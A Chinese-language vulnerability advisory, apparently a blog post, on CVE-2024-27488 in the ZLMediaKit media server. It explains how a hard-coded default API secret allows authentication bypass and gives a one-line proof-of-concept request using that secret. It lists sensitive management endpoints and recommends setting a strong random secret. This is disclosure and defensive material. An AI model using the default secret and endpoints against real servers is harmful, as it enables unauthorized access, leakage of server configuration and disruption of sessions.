CVE-2024-27488_ ZLMediaKit 安全漏洞

CVSS评分:9.8分

CVE-2024-27488_ ZLMediaKit 安全漏洞

  • [1. 漏洞原理](#1. 漏洞原理)
  • [2. 漏洞危害](#2. 漏洞危害)
  • [3. 漏洞修复](#3. 漏洞修复)

1. 漏洞原理

CVE-2024-27488 是 ZLMediaKit 的"硬编码/默认 API 密钥"导致的访问控制缺陷 ------ ZLMediaKit 默认开启 HTTP 管理/控制 API,使用 secret 参数做认证,但默认/示例配置里有硬编码的 secret/示例 secret(或弱随机值),攻击者可利用这一点绕过认证,调用管理类 API(获取配置、会话、控制流、删除/添加代理、kick 等),实现信息泄露或权限滥用。

漏洞参考链接:

硬编码的地址:https://docs.zlmediakit.com/guide/media_server/config_file.html

漏洞验证 poc:

xml 复制代码
GET /index/?secret=035c73f7-bb6b-4889-a715-d9eb2d1925cc

请求的响应类似于:

json 复制代码
{
  "code" : 0,
  "data" : [
    "/index/",
    "/index/api/addFFmpegSource",
    "/index/api/addStreamProxy",
    "/index/api/addStreamPusherProxy",
    "/index/api/closeRtpServer",
    ...
  ]
}

2. 漏洞危害

该漏洞利用难度极低,通过未授权调用 api 接口,可实现一些未授权的操作,例如:

  • /index/api/getServerConfig --- 获取服务配置(可能泄露路径、密钥等)
  • /index/api/getMediaList --- 当前流列表与来源信息
  • /index/api/getAllSession --- 会话/连接详情
  • /index/api/kick_session --- 踢掉会话(验证时请勿滥用)

3. 漏洞修复

conf/config.ini 或运行参数中明确设置强随机 secret(足够长度,字母+数字+符号),并且不要使用示例/默认值 035c73f7-bb6b-4889-a715-d9eb2d1925cc

相关推荐
市象2 小时前
小红书盯上“AI版郑州帮”
人工智能·网络安全·传媒
IpdataCloud4 小时前
直播打赏异常排查:大额打赏IP来自高风险地区?用IP查询定位触发人工审核
网络·tcp/ip·网络安全·ip
山川绿水4 小时前
bugku——MISC——键盘
安全·网络安全·系统安全·密码学
向往着的青绿色5 小时前
雷池(SafeLine)社区版免费部署教程|从环境检查到防护实操全流程
网络·计算机网络·nginx·网络安全·容器·网络攻击模型·信息与通信
波兰的蓝5 小时前
CVE-2016-4437 Apache Shiro反序列化漏洞复现
web安全·网络安全
2401_865382507 小时前
GB/T22240-2020《信息安全技术 网络安全等级保护定级指南》标准解读
网络安全·信息安全·等保测评·标准·信息化项目
努力的lpp7 小时前
小迪安全课程第一节复习笔记
网络安全
free_737 小时前
超越“回答”,AI Agent迎来全链路安全治理挑战
人工智能·python·网络安全
努力的lpp8 小时前
小迪安全课程第二节复习笔记
网络安全
谪星·阿凯8 小时前
从入门到拿Flag:XXE漏洞全解析
安全·web安全·网络安全